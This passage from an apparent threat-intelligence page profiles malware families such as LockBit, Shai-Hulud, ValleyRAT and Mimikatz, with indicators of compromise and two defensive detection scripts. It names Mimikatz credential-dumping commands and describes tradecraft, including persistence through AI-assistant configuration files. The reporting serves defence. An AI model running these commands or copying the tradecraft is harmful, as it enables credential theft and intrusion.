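The artifact paths and hashes above are the kind of indicators a repository or package scan can act on directly. The following is an added example of such a scan; it is not code from the page or from any of the vendors cited. The artifact paths and SHA-256 values are copied from the entry above; everything else, including the sample package tree the demo builds, the `node-gyp rebuild` install script it writes, and the extra hash it passes in (computed from a constructed placeholder file purely to exercise the hash-match branch), is constructed for this demonstration. The verdict logic reflects the caveat a practitioner needs: binding.gyp, .vscode/tasks.json and install scripts are legitimate in many projects, so path and hook hits are leads for review, while a hash match is conclusive.

```python
"""Triage scan of a checked-out repository or unpacked package for the Miasma artifacts above.

Added example; not code from the page or from any vendor. The artifact paths and
SHA-256 values are the ones listed above; the sample tree built by
run_constructed_sample() is made up, and the extra hash it passes in is computed
from a constructed file purely to show that hash matching works.
"""
import hashlib
import json
import tempfile
from pathlib import Path

ARTIFACT_PATHS = {
    "binding.gyp", ".github/setup.js", "_index.js", ".claude/setup.mjs",
    ".claude/settings.json", ".cursor/rules/setup.mdc", ".gemini/settings.json",
    ".vscode/tasks.json",
}
MIASMA_SHA256 = {
    "ceff7c51d70832c3ec8dd2744b606a23b3c924ef664ae23439b9b742ea154108",
    "9f93d77d32833a515bc406c46da477142bb1ac2babeecb6aa42f98669a6db015",
    "6331d1511783dcb1158fb54775f563e90399b3a2a81a584d3cba9a77f63d15a7",
    "58215f1d737443fd782f91c57ec10ad58109a96470054707fc6bfd6358abe468",
    "3f3f42d072bd36860ab7bd7fb5e10ac0d22c741c13c89505ccd6ec0ea572eea7",
}
LIFECYCLE_KEYS = ("preinstall", "install", "postinstall", "prepare")


def sha256_file(path):
    """Stream a file through SHA-256 and return the hex digest."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def matches_artifact(rel):
    """True if rel equals a listed artifact path or ends with one inside a nested package."""
    return any(rel == a or rel.endswith("/" + a) for a in ARTIFACT_PATHS)


def scan_tree(root, known_hashes=MIASMA_SHA256):
    """Walk root and report artifact paths, hash matches, and npm lifecycle hooks."""
    root = Path(root)
    findings = {"artifact_paths": [], "hash_matches": [], "lifecycle_scripts": {}}
    for path in sorted(root.rglob("*")):
        if not path.is_file():
            continue
        rel = path.relative_to(root).as_posix()
        if matches_artifact(rel):
            findings["artifact_paths"].append(rel)
        digest = sha256_file(path)
        if digest in known_hashes:
            findings["hash_matches"].append((rel, digest))
        if path.name == "package.json":
            try:
                scripts = json.loads(path.read_text(encoding="utf-8")).get("scripts", {})
            except (ValueError, OSError, AttributeError):
                continue
            hooks = {k: v for k, v in scripts.items() if k in LIFECYCLE_KEYS}
            if hooks:
                findings["lifecycle_scripts"][rel] = hooks
    # A hash hit is conclusive; paths and hooks alone are leads, since binding.gyp,
    # .vscode/tasks.json and install scripts are all legitimate in many projects.
    if findings["hash_matches"]:
        findings["verdict"] = "high"
    elif findings["artifact_paths"] and findings["lifecycle_scripts"]:
        findings["verdict"] = "review"
    elif findings["artifact_paths"] or findings["lifecycle_scripts"]:
        findings["verdict"] = "low"
    else:
        findings["verdict"] = "clean"
    return findings


def run_constructed_sample():
    """Build a constructed package tree and scan it; returns the findings."""
    with tempfile.TemporaryDirectory() as d:
        root = Path(d)
        (root / ".github").mkdir()
        (root / "README.md").write_text("constructed sample package\n")
        (root / "binding.gyp").write_text('{"targets": []}\n')
        (root / ".github" / "setup.js").write_text("// constructed placeholder, not a real payload\n")
        (root / "package.json").write_text(json.dumps({
            "name": "constructed-sample", "version": "0.0.1",
            "scripts": {"test": "echo ok", "postinstall": "node-gyp rebuild"},
        }))
        # Constructed hash so the sample exercises the hash-match path as well.
        extra = {sha256_file(root / ".github" / "setup.js")}
        return scan_tree(root, known_hashes=MIASMA_SHA256 | extra)


if __name__ == "__main__":
    print(run_constructed_sample())
```

Run it against an unpacked tarball before publishing or installing, or as a CI step over the checkout. Because later Miasma waves are described above as moving execution into binding.gyp and IDE or AI-assistant configuration files rather than visible install scripts, the path list matters as much as the lifecycle-script check; an empty `scripts` block is not a clean bill of health on its own.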
SmokeLoader is a malware loader/backdoor, also referred to as Dofoil, whose capabilities vary by the modules included in a given build. The content describes it as using deception and self-protection techniques, random API function calls, and a multi-stage decryption process. It uses HTTP for command-and-control, and some reporting notes that it may generate requests to legitimate sites such as microsoft.com, bing.com, and adobe.com to mask activity; downloads may also return HTTP 404 responses that still contain data in the response body. SmokeLoader has been used both as a payload and as a delivery mechanism for other malware. Reported follow-on or associated payloads in the content include Phobos ransomware in 8Base intrusions, as well as Amadey and other commodity malware families. VMware Carbon Black reported that in 8Base activity, SmokeLoader provided initial obfuscation, unpacking, and loading of Phobos ransomware, while SystemBC encrypted command-and-control traffic. The malware is also mentioned in campaigns or ecosystems involving TA577 phishing operations, StealC-linked delivery chains, DanaBot-delivered payloads, and ErrTraffic campaigns. TA577, described in the content as a Russia-based threat group, has delivered SmokeLoader alongside Qbot, IcedID, SystemBC, Ursnif, Cobalt Strike, Pikabot, and DarkGate. The content also links SmokeLoader to broader criminal loader ecosystems repeatedly targeted by Operation Endgame, including server seizures and disruption of botnet customers and infrastructure in 2024-2026. A specific IOC mentioned in the content is the MD5 hash e818a9afd55693d556a47002a7b7ef31, labeled as a SmokeLoader hash.
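The note above that SmokeLoader downloads may come back as HTTP 404 responses that still carry data in the body gives a proxy-log check: an error page with a payload-sized or non-text body is worth a look. The following is an added example of that check over constructed proxy log lines; it is not code from the page or from any vendor. The log format, client addresses, hostnames (the `.test` domain is a reserved placeholder) and sizes are all made up, and the 32 KiB threshold is an assumption to be replaced with the size of the organisation's own error pages.

```python
"""Flag HTTP 404 responses whose body looks like content rather than an error page.

Added example; not code from the page or from any vendor. The proxy log format and
every line below are constructed for this demonstration.
"""
import re
from collections import namedtuple

Resp = namedtuple("Resp", "ts client dst status size ctype")

SAMPLE_PROXY = """\
2026-06-02T10:01:02Z client=10.0.0.5 dst=www.example-corp.com status=404 bytes=1187 ctype=text/html
2026-06-02T10:01:09Z client=10.0.0.5 dst=cdn.example-corp.com status=200 bytes=52311 ctype=application/javascript
2026-06-02T10:03:44Z client=10.0.0.5 dst=update-host.test status=404 bytes=184320 ctype=application/octet-stream
2026-06-02T10:03:50Z client=10.0.0.5 dst=update-host.test status=404 bytes=96533 ctype=text/html
2026-06-02T10:04:12Z client=10.0.0.7 dst=www.example-corp.com status=404 bytes=1187 ctype=text/html
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) client=(?P<client>\S+) dst=(?P<dst>\S+) status=(?P<status>\d+) "
    r"bytes=(?P<size>\d+) ctype=(?P<ctype>\S+)$"
)


def parse(text):
    """Parse the constructed proxy format; malformed lines are skipped."""
    out = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            g = m.groupdict()
            out.append(Resp(g["ts"], g["client"], g["dst"], int(g["status"]), int(g["size"]), g["ctype"].lower()))
    return out


def suspicious_404s(responses, max_error_page_bytes=32768):
    """Return (dst, client, reasons) for 404s with a non-text or oversized body.

    max_error_page_bytes is an assumed ceiling for a genuine error page; tune it
    from the sizes your own proxies actually see for 404 responses.
    """
    hits = []
    for r in responses:
        if r.status != 404:
            continue
        reasons = []
        if not r.ctype.startswith("text/"):
            reasons.append(f"404 with non-text body ({r.ctype})")
        if r.size > max_error_page_bytes:
            reasons.append(f"404 body of {r.size} bytes exceeds {max_error_page_bytes}")
        if reasons:
            hits.append((r.dst, r.client, reasons))
    return hits


if __name__ == "__main__":
    for hit in suspicious_404s(parse(SAMPLE_PROXY)):
        print(hit)
```

Both conditions fire independently so that a loader which sets a text/html content type on a large binary body is still caught by size, and a small binary blob is still caught by type. The hits are a lead for pulling the response body from a full-capture or sandbox source, not a verdict on their own, since some content delivery networks do return non-trivial bodies on 404.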
Mistic is a stealthy backdoor, also tracked as MLTBackdoor, that has been used since April 2026 in financially motivated intrusions targeting organizations in the insurance, education, IT, and professional services sectors. Reporting links it with low confidence to the initial access broker KongTuke, also known as Woodgnat, a criminal actor assessed to compromise enterprise networks and sell access to ransomware operators. KongTuke-linked access has been associated with ransomware ecosystems including Qilin, Interlock, Rhysida, Akira, 8Base, and Black Basta. Observed delivery and execution involved DLL sideloading through the legitimate Microsoft executable MpExtMs.exe. In reported cases, a malicious loader DLL named version.dll loaded the Mistic payload from EndpointDlp.dll, a filename chosen to resemble Microsoft endpoint-security tooling. Separate intrusions also included a .NET DLL that displayed a fake login screen to steal credentials. Zscaler documented the malware earlier in June 2026 under the name MLTBackdoor and observed delivery through a multi-stage ClickFix infection chain. Mistic provides standard backdoor functionality including upload, download, move, rename, and delete operations on files, folder creation, configurable command-and-control check-in intervals, and retrieval of additional commands from attacker-controlled infrastructure. It can execute payloads or code received from command-and-control directly in memory, avoiding disk writes and reducing file-based detection opportunities. Multiple reports also state that it can load Beacon Object Files to extend functionality in memory. A built-in kill switch allows the malware to terminate and delete itself from the infected host, further increasing stealth and making it suitable for long-term covert access.
Mistic has been observed alongside ModeloRAT, another KongTuke/Woodgnat-linked remote access tool, and the broader activity has been described as opportunistic targeting consistent with an initial access broker model rather than direct ransomware deployment by the same operator. Reported indicators of compromise include EndpointDlp.dll SHA-256 1e41c7bfaa6aa3b93b6cc024274a10e33f3e12fe7c98c1db387ef8927f9d1984, loader version.dll SHA-256 59e3c4cb06331b4f2d78a9a0592f3747e573bd01c5a7650c26361d1e25520712, IPs 142.93.242.144, 144.31.53.78, 198.13.159.44, and 199.91.221.42, domains authorized-logins.net, thomphon.com, updater-worelos.com, upd-domain-goloro.com, upscale-kolo.com, and sql-updater-service.com, and the delivery URL hxxp://thomphon.com/update.msi.
FortigateSniffer is a custom Golang-based credential-harvesting tool used in the FortiBleed campaign against compromised FortiGate firewalls since at least February 2026. It is also tracked as fg_sniffer and has been reported as compiled for both Linux and Windows, including fg_sniffer_linux_amd64 and fg_sniffer_windows_amd64.exe. Rather than relying on a traditional exploit payload for packet capture, the tool abuses the legitimate FortiOS diagnostic command "diagnose sniffer packet" to passively intercept authentication traffic traversing infected FortiGate appliances. Reported capabilities include simultaneous monitoring of 24 protocols and parsing of authentication material from intercepted flows. Protocols explicitly mentioned in the reporting include Kerberos, LDAP, SMB, RADIUS, RDP, WinRM, SMTP, FTP, MySQL, Microsoft SQL Server, PostgreSQL, Telnet, RPC, and TACACS+. The tool and associated processing pipeline were reported to extract plaintext usernames and passwords, NTLM/NTLMv2 hashes, Kerberos hashes and tickets, session cookies, tokens, email credentials, database credentials, and other authentication artifacts. Some reporting states that captured output was converted into PCAP/PCAPNG format and further analyzed by tooling referred to as SNIFTRAN and a PCAP Deep Analysis Toolkit. Deployment occurred after attackers gained administrative or SSH access to FortiGate devices through brute force, credential stuffing, dictionary attacks, leaked credentials, and exploitation of unpatched FortiGate vulnerabilities. The malware was described as turning compromised firewalls into passive credential collectors positioned at the network boundary. Researchers reported geofencing and time-based execution controls, including activation only for certain IP ranges and operation during 07:00-18:00 Moscow time. 
FortigateSniffer is associated in the reporting with the broader FortiBleed operation, which researchers assessed as likely run by a financially motivated initial access broker; some reporting notes possible Russian-speaking links, though attribution remains unconfirmed. Targeting was global across FortiGate devices, with emphasis on small and medium-sized organizations, especially in the United States and India, and notable interest in IT providers and managed service providers. The harvested credentials were reportedly fed into distributed cracking and validation infrastructure and then reused for lateral movement, Active Directory reconnaissance, SMB/network-share access, session hijacking, and potential resale of access for follow-on criminal or espionage activity.
ValleyRAT is a modular, full-featured remote access trojan (RAT) written in C++ and built on the Winos4.0 framework, which multiple sources describe as rebuilt from or derived from Gh0stRAT. The payloads generated by Winos4.0 are referred to by Proofpoint as ValleyRAT, and the malware is also referenced as Winos4.0 or Winos 4.0 in reporting. It provides operators with broad remote access functionality and has been observed in cyber-espionage and financially motivated campaigns. Reported capabilities include command-and-control communications, system reconnaissance, persistence, command execution, file upload and download, payload injection, credential harvesting, keylogging, and on-demand module delivery. Specific behaviors documented for ValleyRAT_S2, described as a second-stage ValleyRAT payload, include reconnaissance of OS, locale, architecture, environment variables, registry settings, installed software, drives, file systems, and running processes; persistence via Task Scheduler COM APIs; process injection using SetThreadContext, WriteProcessMemory, and CreateRemoteThread; keystroke monitoring via SetWindowsHookEx; dynamic API resolution via LoadLibrary and GetProcAddress; watchdog recovery using %TEMP%\target.pid and %TEMP%\monitor.bat; staging under %APPDATA%\Promotions\Temp.aps; execution through cmd.exe; and retry/delay logic to reduce detection. Proofpoint additionally states ValleyRAT supports DDoS functionality and can download additional modules on demand. Observed delivery and execution methods include fake Chinese-language software installers, DLL side-loading with malicious DLLs such as steam_api64.dll and apphelp.dll placed beside legitimate signed applications, phishing attachments, compressed archives with disguised executables, abuse of software update channels, and downloader activity using Winos4.0. One analyzed sample masqueraded as an AI spreadsheet tool and used a malicious steam_api64.dll. 
Reporting also describes broader campaigns using DLL sideloading through files such as QQMusicCommon.dll, tedutil.dll, msys-2.0.dll, gxc_x64.dll, and VsGraphicsCore.dll, as well as WhatsApp- and phishing-driven delivery in some ecosystems associated with ValleyRAT or Winos4.0 activity. ValleyRAT has been linked in reporting to Chinese-speaking threat activity and is commonly associated with the Silver Fox cluster, although some specific campaigns with infrastructure overlap were not confidently attributed. Proofpoint reports TA4922 using ValleyRAT/Winos4.0 in financially motivated campaigns targeting organizations across East Asia, Europe, and South Africa, while other reporting notes targeting of Chinese-speaking regions including mainland China, Hong Kong, Taiwan, and Southeast Asia. Additional reporting describes Indonesia-focused tax-themed phishing delivering malware identified as ValleyRAT/Winos4.0/Backdoor SilverFox. High-confidence infrastructure and indicators mentioned in the content include command-and-control endpoints 27.124.3.175:14852 for ValleyRAT_S2 and 143.92.37.168:10086 using the Gh0stKCP protocol; IP 202.61.160.201 previously observed as infrastructure associated with ValleyRAT and Gh0st RAT activity; downloader activity to 154.201.68.57; and a sample hash d6387be78d258a820e4cb35ec53c65d52a813b63147488629b56269f6648adc1 for valleyrat_s2. Additional artifacts include %TEMP%\target.pid, %TEMP%\monitor.bat, %APPDATA%\Promotions\Temp.aps, and benign-looking names such as Telegra.exe and WhatsApp.exe used in memory or staging.
AryStinger is a previously undocumented botnet malware family identified by QiAnXin XLab that compromises aging internet-facing edge devices, primarily end-of-life routers and some NAS appliances, and repurposes them as a distributed reconnaissance, proxy, and intrusion-support infrastructure. XLab reported at least 4,300 infected routers worldwide, with infections concentrated in South Korea and China, and with D-Link DIR-850L and DIR-818LW models on Realtek RTL819X chipsets prominently affected. The campaign was first observed on March 12, 2026, with activity spreading from 107.150.106.14 using a Linux ELF sample that reportedly had zero VirusTotal detections at the time. AryStinger primarily exploits long-known vulnerabilities in obsolete or unsupported devices rather than novel exploit chains. Reported infection vectors include CVE-2013-3307 and CVE-2016-5681 against older Linksys and D-Link routers, and a later observed Go-based variant targeting QNAP NAS devices via CVE-2025-11837 in QNAP Malware Remover. Researchers described two variants: a C-based router-focused build optimized for low-resource RTL819X devices, and a more capable Go-based NAS-focused build. Its functionality is oriented toward pre-intrusion operations rather than classic DDoS or cryptomining botnet activity. Reported capabilities include port scanning, service identification, subdomain enumeration, DNS scanning, traffic tunneling and proxying, remote command execution, and distributed task execution across infected nodes. The NAS variant was reported to support broader reconnaissance and payload execution, including shell commands and attacker-supplied Go, Java, and Python code, and to integrate tools such as fscan, ksubdomain, httpx, and Tlsx. XLab described infected devices as remotely controlled "Executors" that receive tasks from command-and-control infrastructure and return results, while also helping operators conceal their true origin behind victim network connections. 
AryStinger communicates with command-and-control servers over HTTP and HTTPS using Protocol Buffers with XOR obfuscation; some reporting also notes gzip compression in the NAS variant. A hardcoded XOR key, "sh_#@!_2024_secret", was reported. Persistence mechanisms observed include installation of an SSH backdoor using Dropbear on routers, operation on port 2332, use of gs-netcat on NAS devices, and modification of device configuration for long-term control. Reported indicators and artifacts include domains such as ajb8.com, dataexplore.cc, dataexplore.co, specific C2 hosts including eixfi[.]ajb8.com and dybic[.]ajb8.com, downloader activity from hgodpcx[.]ajb8.com and hgodpcx[.]auq8.com, binaries or files under /tmp/bin, and processes named syswapd0, syswapd0h, or syswapd0w. XLab has not attributed AryStinger to a known threat actor. Multiple reports note that its operational pattern resembles operational relay box or router-proxy infrastructures used to support follow-on intrusion activity.
LockBit is a ransomware family and Ransomware-as-a-Service (RaaS) operation active since at least 2019–2020. The content describes multiple versions and aliases including LockBit 2.0, LockBit 3.0 / LockBit Black, LockBit 4 Green, and references to LockBit 5.0 IOC reporting. LockBit is associated with double extortion, with operators encrypting victim data and exfiltrating it for additional leverage. It is described as one of the most prolific ransomware operations, with LockBit 3.0 listed as having 928 victims in 2023, and LockBit infrastructure was seized on 19 February 2024 during Operation Cronos. Observed delivery and access vectors in the content include Cobalt Strike as a common initial delivery mechanism for LockBit 3.0, exploitation of Citrix NetScaler ADC and Gateway appliances via CVE-2023-4966 (Citrix Bleed) by LockBit 3.0 affiliates, abuse of SonicWall SMA100 vulnerabilities CVE-2019-7481 and CVE-2021-20028 to install LockBit ransomware, and secondary delivery through malware chains such as StealC -> XTinyLoader -> LockBit Black. SocGholish infections were also observed leading to LockBit deployment. The content also notes living-off-the-land tradecraft and staging payloads inside password-protected ZIP or RAR archives. Behaviorally, LockBit is encryption-focused and very fast. LockBit 3.0 is described as capable of encrypting an entire computer in under one minute, requiring administrator privileges and sometimes using UAC bypass to obtain elevation. It installs itself as multiple services for persistence, attempts to terminate selected services, updates the ransom note, and changes the victim desktop wallpaper. 
LockBit 4 Green is described as a packed 64-bit executable with importless execution, dynamic API resolution via hashing, XOR-based string decryption, proxy DLL loading through RtlQueueWorkItem and LoadLibraryW, ETW patching, DLL notification removal, module unhooking using KnownDlls mapping and WriteProcessMemory, and vectored exception handler clearing. It checks keyboard layouts and appears to avoid encryption on Russian-language systems, checks system architecture, supports command-line options including --help and -q, decrypts an embedded ransom note with a custom RC4 algorithm, disables the Volume Shadow Copy Service and Windows Search service, writes a ransom note named Restore-My-Files.txt, excludes specific files and paths, and uses partial encryption by fully encrypting files under 1 MB and about 27% of larger files. Anti-analysis and anti-debugging features described for LockBit 3.0 include packing, code obfuscation, dynamic function resolution, password-gated execution, an encrypted .text section, heap flag checks, NtSetInformationThread with ThreadHideFromDebugger, and tampering with DbgUiRemoteBreakin. LockBit 4 Green additionally uses ETW suppression and other monitoring-evasion techniques. The content links LockBit to broad victimization across sectors and geographies. Specific examples include a ransomware attack using a LockBit variant against the Semyonishna dairy processing plant in southern Siberia. Manufacturing is noted as a heavily targeted industry among prolific ransomware operators. The content also references affiliate infrastructure and exfiltration activity, including repeated use of the hostname WIN-LIVFRVQFMKO in LockBit extortion incidents and FTP-over-TLS exfiltration infrastructure. 
High-confidence indicators directly mentioned in the content include the LockBit 4 Green sample hash 8ff61e4156c10b085e0c2233f24e8501, ransom note filename Restore-My-Files.txt, hostname WIN-LIVFRVQFMKO associated with LockBit extortion infrastructure, and low-confidence LockBit 5.0-related IOC reporting that includes karma0.xyz, 205.185.116.233, and MD5 e818a9afd55693d556a47002a7b7ef31. The content explicitly notes that several LockBit 5.0 indicators are inferential and high in false-positive risk.
TinyRCT is a previously undocumented lightweight C#/.NET remote access trojan and backdoor for Windows used by the Chinese-speaking threat cluster CL-STA-1062, which overlaps with UAT-7237. It has been observed in espionage-focused intrusions targeting government entities and state-owned critical energy infrastructure in Southeast Asia. Reported capabilities include arbitrary command execution via cmd.exe, remote host management, directory and file enumeration, file reading and exfiltration, screenshot capture as JPEG, downloading files from URLs, and self-deletion. TinyRCT communicates with hardcoded command-and-control infrastructure over plain HTTP, using AES-128-CBC encryption; reported details include C2 address 45.32.113[.]172, a default 10-second polling interval, and a hardcoded key "ThisIsASecretKey87654321". File exfiltration was described as occurring in 40 KB gzip-compressed AES-encrypted chunks. The malware contains a Simplified Chinese string in its code. Unit 42 found the payload hosted on attacker infrastructure at 139.180.134[.]221 as PerfWatson2.exe, a filename chosen to mimic a legitimate Microsoft Visual Studio telemetry component. TinyRCT was delivered through a DLL side-loading/AppDomainManager injection chain using a malicious archive named chrome_setup.zip containing a legitimate signed chrome_setup.exe, a malicious chrome_setup.exe.config, and a rogue MyAppDomainManager.dll. The loader checked for execution from the user Downloads directory, retrieved PerfWatson2.exe from the staging server, dropped it into %LOCALAPPDATA%, and created a scheduled task named GoogleUpdaterTaskSystem140.0.7272.0 for persistence. TinyRCT itself terminates if not running from %LOCALAPPDATA%. Its self-destruct routine uses choice.exe to delay deletion and removes its persistence scheduled task.
Reported related indicators include 139.180.134[.]221, 45.32.113[.]172, PerfWatson2.exe, chrome_setup.zip, MyAppDomainManager.dll, and the scheduled task name GoogleUpdaterTaskSystem140.0.7272.0.
Mimikatz is a widely used open-source post-exploitation and credential access tool for Windows that is repeatedly referenced in the content as being used to dump credentials from LSASS memory, including via the `sekurlsa::logonpasswords` function. The content also references additional Mimikatz capabilities including pass-the-hash, pass-the-ticket, Golden Ticket abuse, DCSync (`lsadump::dcsync`), token elevation, and patching Remote Desktop with `ts::multirdp`. It is used both as a red-team tool and by threat actors in real intrusions. The content directly associates Mimikatz with credential dumping from LSASS (MITRE ATT&CK T1003/T1003.001), often requiring administrative or SYSTEM privileges. Multiple examples show execution as `mimikatz.exe`, reflective or in-memory loading through PowerShell scripts, and use in lab, detection, and intrusion scenarios. Defenders are advised in the content to monitor Sysmon Process Access events involving `lsass.exe`, suspicious strings such as `mimikatz`, and related process chains. Threat activity in the content links Mimikatz to several actors and campaigns. Palo Alto Networks Unit 42 reported that the Chinese-speaking cluster CL-STA-1062, overlapping with Cisco Talos' UAT-7237, used Mimikatz alongside SoftEther VPN, VNT, Yuze, and JuicyPotato while targeting Southeast Asian government entities and state-owned energy infrastructure from at least 2022 through 2025. Symantec also described a small opportunistic cybercrime operation in which attackers used PowerShell-delivered Mimikatz variants to dump credentials after PsExec-based access. The Makop ransomware gang is also described as using Mimikatz as part of its intrusion toolkit. The content also describes a modified embedded Mimikatz payload delivered through DLL search order hijacking: a malicious `MSVCR100.dll` loaded by Oracle-signed `unpack200.exe` decrypted and launched a modified Mimikatz 2.1.1 instance for credential theft. 
In that case, the malware authors removed the standard banner and changed the command-line output string from `mimikatz (command line)` to `bing (command line)` to reduce obvious detection. High-confidence indicators and artifacts directly mentioned in the content include the executable name `mimikatz.exe`, common command strings such as `privilege::debug sekurlsa::logonpasswords`, `sekurlsa::pth`, `lsadump::dcsync`, and `ts::multirdp`, and the modified output string `bing (command line)` in the unpack200/MSVCR100.dll case.
Shai-Hulud is a self-propagating software supply-chain worm and credential-stealing malware family primarily associated with malicious npm packages, later expanding into PyPI and related developer tooling ecosystems. Multiple reports attribute early waves to TeamPCP, also tracked as UNC6780, though attribution after the public release of the worm’s source code on 2026-05-12 became less certain due to copycat reuse. The malware targets developer workstations, CI/CD runners, GitHub repositories, package publishing pipelines, and cloud-connected build environments. Reported capabilities include harvesting npm and PyPI publishing credentials, GitHub tokens, GitHub CLI tokens, AWS credentials, Azure credentials, Google Cloud credentials, Kubernetes secrets, HashiCorp Vault credentials, SSH keys, Docker configuration, shell history, password-manager data, and other CI/CD secrets. Several analyses specifically describe theft from GitHub Actions runners, including scraping Runner.Worker process memory on Linux to obtain OIDC tokens and secrets, abuse of trusted publishing workflows, and use of compromised CI identities to publish malicious artifacts with valid provenance. Propagation behavior is central to the family. Shai-Hulud uses stolen npm or repository credentials to modify packages, inject malicious code, publish poisoned releases, and backdoor repositories and workflows. Reported techniques include npm lifecycle-script abuse via preinstall/postinstall hooks, execution through binding.gyp/node-gyp to evade scanners focused only on package.json scripts, Bun-based staged payload execution, malicious GitHub Actions workflow injection, and persistence through IDE and developer-tool configuration files such as .claude/settings.json, .cursor/rules/setup.mdc, .vscode/tasks.json, and .gemini/settings.json. 
Persistence mechanisms also include systemd services, macOS LaunchAgents, Claude Code hooks, gh-token-monitor/dead-man-switch logic, and related token-monitoring components. Exfiltration commonly uses GitHub as a dead-drop channel rather than a traditional C2 server. Reports describe the malware creating attacker-controlled or victim-account GitHub repositories, often storing encrypted stolen data under results/ paths and using campaign marker strings such as "Miasma: The Spreading Blight" or "Alright Lets See If This Works". Other reported infrastructure and markers linked to Shai-Hulud waves include the impersonation domain git-tanstack.com, staged camouflage using hxxps://api[.]anthropic[.]com/v1/api, and commit-search/dead-drop markers such as firedalazer and thebeautifulmarchoftime. The malware encrypts stolen data using public-key cryptography with AES-256-GCM; one linked incident reused the same 4096-bit RSA public key across Shai-Hulud-related tooling and a poisoned mistralai PyPI release. The family has been tied in reporting to numerous supply-chain incidents affecting legitimate package ecosystems and trusted release channels, including Red Hat npm packages, TanStack, Leo/RStreams, LiteLLM, Trivy-related activity, Nx Console, @antv, durabletask on PyPI, and a malicious mistralai==2.4.6 release. Reported impacts range from hundreds to more than a thousand compromised packages and widespread downstream exposure in environments with AWS, GitHub, and CI/CD access. In one Fortinet-investigated case linked to Shai-Hulud tradecraft, stolen Jenkins/AWS instance-role credentials were used for cloud intrusion, IAM user creation, privilege escalation, Secrets Manager and Redshift access, and exfiltration staging.
Known high-confidence indicators and artifacts mentioned in the reporting include git-tanstack.com, hxxps://api[.]anthropic[.]com/v1/api, models.litellm.cloud, setup_bun.js, bun_environment.js, litellm_init.pth, updater.py, .github/workflows/discussion.yaml, .claude/settings.json, .cursor/rules/setup.mdc, and .vscode/tasks.json. Additional linked IOCs from a related poisoned mistralai release include IP 83.142.209.194, package mistralai==2.4.6, SHA256 6dbaa43bf2f3c0d3cddbca74967e952da563fb974c1ef9d4ecbb2e58e41fe81b for the package archive, and SHA256 5245eb032e336b85cff0dbb3450d591826bf2ef214fd30d7eba1a763664e151b for transformers.pyz.
Edgecution is a malware framework centered on a malicious Microsoft Edge extension used to escape browser sandbox restrictions and deploy a host-level Python backdoor on Windows systems. Zscaler ThreatLabz reported that it is used in ransomware-related intrusions and assessed the activity as likely tied to an initial access broker associated with the Payouts King/Payouts Kings ransomware operation. The malware has a two-part architecture: a malicious Edge extension, often disguised as an "Edge Monitoring Agent," and a Python-based backdoor. The extension communicates with command-and-control infrastructure over WebSockets and abuses the Chrome Native Messaging protocol, including chrome.runtime.sendNativeMessage, to relay commands to the Python backdoor running on the host. This design allows the malware to bypass normal browser isolation and interact directly with the operating system. Observed capabilities include collecting system information, filesystem access and file writing, process listing, shell command execution, PowerShell execution, and execution of arbitrary Python code supplied by the attacker. The backdoor reads length-prefixed JSON messages from standard input, returns JSON responses, and in some observed descriptions executes briefly and exits after handling commands, likely to reduce detection. The malware also stores a decryption key in the Windows registry under HKCU\SOFTWARE\Microsoft\Edge as AppKey to decrypt protected strings in the Python backdoor. Initial access is achieved through social engineering. Attackers impersonate IT support personnel on Microsoft Teams and direct victims to a fake Microsoft site presented as an "Outlook Updates Management Console" or spam filter update page. The site offers multiple deployment methods, including an obfuscated AutoHotKey script, a Windows batch script, and a PowerShell script, and may also request Microsoft 365 or Outlook credentials. 
The infection chain delivers a malformed or encrypted ZIP archive designed to evade detection by removing ZIP magic bytes. Reported contents include an embedded Python 3.13.3 runtime and directories for the extension and native components. Deployment scripts repair the archive, extract files, create a native messaging manifest and launcher batch file, and schedule Microsoft Edge to run in headless mode with parameters such as --user-data-dir, --load-extension, --no-first-run, --disable-sync, and --headless=new. This causes the malicious extension to run in a hidden Edge instance, providing stealthy persistence while remaining invisible during normal browser use. Reported indicators of compromise include the WebSocket C2 URLs wss://d3nh8sl98s2554.cloudfront.net/ws, wss://d2g6dl71gua1qa.cloudfront.net/ws, wss://d1jp293q9tvi92.cloudfront.net/ws, and wss://d23l50n6ubud7p.cloudfront.net/ws, as well as SHA-256 hashes a08d8e63b0cd3638fb40b8e6da546e26da69439597565827f9cec87915f78568 for the extension background.js and 3d1158884fb339b3328bd330fcc27598e1f1c94bcac39e75d1a272afa4deee1a for the Python backdoor.
AsyncRAT is a .NET remote access trojan (RAT) and commodity malware family that can monitor and remotely control infected Windows systems. It was introduced on GitHub as open-source remote administration software and is widely abused by threat actors for malicious purposes. Reported capabilities in the provided content include remote control, screen recording, checking whether the current user has administrator privileges, and hiding scheduled task execution via ProcessWindowStyle.Hidden. In broader reporting cited here, AsyncRAT is also described as a follow-on payload or backdoor used to give attackers full control over compromised systems. Observed delivery and infection chains in the content show AsyncRAT being distributed through multiple common initial access mechanisms. One chain used phishing emails with malicious Microsoft OneNote .one attachments that tricked users into launching embedded HTA, VBS, or WSF files via wscript.exe or mshta.exe; subsequent cmd.exe and PowerShell activity downloaded a malicious batch file and decoy notebook, and the final payload was AsyncRAT or similar info-stealing malware. Another analyzed malspam-driven chain used a ZIP archive named in the pattern E-STATMENT<digits>.exe.zip containing a Nullsoft installer and a PyInstaller-packed secondary payload; dynamic analysis linked its command-and-control traffic to AsyncRAT at 144.126.151.185:2005, with persistence via a Startup .lnk and HKCU\Software\fontdrvhost. Additional reporting in the content describes AI-themed lure archives delivering AsyncRAT through a complex multi-stage chain involving a malicious LNK, hidden PDFs, layered PowerShell, AutoHotkey-based loaders, scheduled tasks, process hollowing into legitimate .NET executables, and Microsoft Defender exclusions; one AsyncRAT branch in that campaign communicated with 107.172.10.190. AsyncRAT also appears repeatedly as a secondary payload delivered by other malware ecosystems and loaders. 
